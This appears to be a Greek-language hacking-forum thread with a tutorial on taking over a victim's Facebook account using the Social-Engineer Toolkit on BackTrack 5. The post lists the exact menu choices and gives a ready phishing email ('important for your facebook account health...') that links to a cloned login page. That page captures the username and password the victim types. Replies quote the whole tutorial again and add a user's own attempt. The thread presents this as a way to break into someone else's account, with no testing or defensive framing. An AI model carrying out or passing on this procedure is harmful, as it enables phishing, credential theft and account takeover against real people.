Credential Harvester Attack Method - Backtrack 5 R1 Tutorial

Link --> https://www.youtube.com/watch?v=FBSSM_0yKvo

Σε αυτό το post θα εξηγήσω πως μπορούμε να αποκτήσουμε το Username και το Password του λογαριασμού του στο Facebook.
Για να το πραγματοποιήσουμε θα χρειαστούμε 2 εργαλεία που εμπεριέχονται στο λειτουργικό σύστημα BackTrack 5 R1.
Πρόκειται:
Α) Για το Mass Mailer
Β) Το Harvester Attack Vector

Με το πρώτο στέλνω email στο θύμα μου με το link του κλώνου της εισόδου της σελιδας του Facebook (δημιουργία Fake site). Και αφού κάνω αυτό μετά χρησιμοποιώ το Harvester Attack Vector.

Terminal: cd pentest/exploits/set ↵
./set ↵

*Αυτό μπορεί να γίνει και από το μενού του backtrack 5 ακολουθόντας τη διαδρομή Bt5 --> explotation tools --> social engineering tools --> set

Α) Χρησιμοποίηση του Mass Mailer για αποστολή μυνήματος στο θύμα...

Terminal: 5 ↵ [Mass Mailer Attack]
1 ↵ [E-Mail Attack Single E-mail Address]
Enter who you want to send e-mail to: victim_e-mail@gmail.com ↵
1 ↵ [Enter my_e-mail@hotmail.com]
[Enter my password e-mail]
Enter subject of your email: Reminder ↵
1 ↵ [HTML] or 2 ↵ [Plain] --> Επιλέγω 2 ↵
Next line of the body: This message is an important for your facebook account health. Please update your account so that we present it for hacking attacks. Please follow the link below to update your account.

http://(my ip address)

Regards
^C ↵ (Ctrl + C)

Αυτό που καταφέραμε να κάνουμε με το Mass Mailer είναι να στείλουμε ένα μήνυμα στο θύμα στο οποίο του λέμε να μπεί και να κάνει επιβεβαίωση το λογαριασμό του.

Β) Σε αυτό το στάδιο χρησιμοποιούμε το Credential Harvester Attack.

Terminal: cd pentest/exploits/set ↵
./set ↵

*Αυτό μπορεί να γίνει και από το μενού του backtrack 5 ακολουθόντας τη διαδρομή Bt5 --> explotation tools --> social engineering tools --> set

Στη συνέχεια ακολουθούμε:
Terminal: 2 ↵
3 ↵
1 ↵
4 ↵
Στο σημείο αυτό θα μας βγάλει ''Press {return} to continue'' πατάμε enter και μας βγάζει τρεις σειρές με μπλε γράμματα. Όταν το θύμα ανοίξει το link που του στείλαμε τότε ανοίγει η σελίδα του κλώνου του facebook που δημιουργήσαμε και αυτός όταν πληκτρολογίσει το username – password τότε κοιτάμε στο terminal και μας δείχνει τι πληκτρολόγισε. Έτσι αποκτάμε πρόσβαση στο λογαριασμό του.

Περισσότερες λεπτομέρειες στο βίντεο του link! Αν υπάρχουν διορθώσεις η επιπλέον προσθήκες στο post ας αναρτηθούν
*ΣΗΜΕΙΩΣΗ: Θα πρέπει πρώτα να δημιουργήσουμε server για να μπορέσει το θύμα να ανοιξει το link που δημιουργήσαμε. Παιδιά Term, Legend κτλ διορθώστε με αν λέω κάτι λάθος.
Ευχαριστώ

Τι εννοείς με τον server;;

Νόμιζα ότι έπερεπε να έχεις ftp manager για να το κάνεις αυτό αλλά δε χρειάζεται το έψαξα... Ευχαριστώ!!!

Ααα ωραία μια χαρά τότε!

[HMS]Gludiator έγραψε:

Link --> https://www.youtube.com/watch?v=FBSSM_0yKvo

Σε αυτό το post θα εξηγήσω πως μπορούμε να αποκτήσουμε το Username και το Password του λογαριασμού του στο Facebook.
Για να το πραγματοποιήσουμε θα χρειαστούμε 2 εργαλεία που εμπεριέχονται στο λειτουργικό σύστημα BackTrack 5 R1.
Πρόκειται:
Α) Για το Mass Mailer
Β) Το Harvester Attack Vector

Με το πρώτο στέλνω email στο θύμα μου με το link του κλώνου της εισόδου της σελιδας του Facebook (δημιουργία Fake site). Και αφού κάνω αυτό μετά χρησιμοποιώ το Harvester Attack Vector.

Terminal: cd pentest/exploits/set ↵
./set ↵

*Αυτό μπορεί να γίνει και από το μενού του backtrack 5 ακολουθόντας τη διαδρομή Bt5 --> explotation tools --> social engineering tools --> set

Α) Χρησιμοποίηση του Mass Mailer για αποστολή μυνήματος στο θύμα...

Terminal: 5 ↵ [Mass Mailer Attack]
1 ↵ [E-Mail Attack Single E-mail Address]
Enter who you want to send e-mail to: victim_e-mail@gmail.com ↵
1 ↵ [Enter my_e-mail@hotmail.com]
[Enter my password e-mail]
Enter subject of your email: Reminder ↵
1 ↵ [HTML] or 2 ↵ [Plain] --> Επιλέγω 2 ↵
Next line of the body: This message is an important for your facebook account health. Please update your account so that we present it for hacking attacks. Please follow the link below to update your account.

http://(my ip address)

Regards
^C ↵ (Ctrl + C)

Αυτό που καταφέραμε να κάνουμε με το Mass Mailer είναι να στείλουμε ένα μήνυμα στο θύμα στο οποίο του λέμε να μπεί και να κάνει επιβεβαίωση το λογαριασμό του.

Β) Σε αυτό το στάδιο χρησιμοποιούμε το Credential Harvester Attack.

Terminal: cd pentest/exploits/set ↵
./set ↵

*Αυτό μπορεί να γίνει και από το μενού του backtrack 5 ακολουθόντας τη διαδρομή Bt5 --> explotation tools --> social engineering tools --> set

Στη συνέχεια ακολουθούμε:
Terminal: 2 ↵
3 ↵
1 ↵
4 ↵
Στο σημείο αυτό θα μας βγάλει ''Press {return} to continue'' πατάμε enter και μας βγάζει τρεις σειρές με μπλε γράμματα. Όταν το θύμα ανοίξει το link που του στείλαμε τότε ανοίγει η σελίδα του κλώνου του facebook που δημιουργήσαμε και αυτός όταν πληκτρολογίσει το username – password τότε κοιτάμε στο terminal και μας δείχνει τι πληκτρολόγισε. Έτσι αποκτάμε πρόσβαση στο λογαριασμό του.

Περισσότερες λεπτομέρειες στο βίντεο του link! Αν υπάρχουν διορθώσεις η επιπλέον προσθήκες στο post ας αναρτηθούν
*ΣΗΜΕΙΩΣΗ: Θα πρέπει πρώτα να δημιουργήσουμε server για να μπορέσει το θύμα να ανοιξει το link που δημιουργήσαμε. Παιδιά Term, Legend κτλ διορθώστε με αν λέω κάτι λάθος.
Ευχαριστώ

mia fora phga na kanw k egw kati teteio nmz na kanw clone thn selida alla den petixe pantos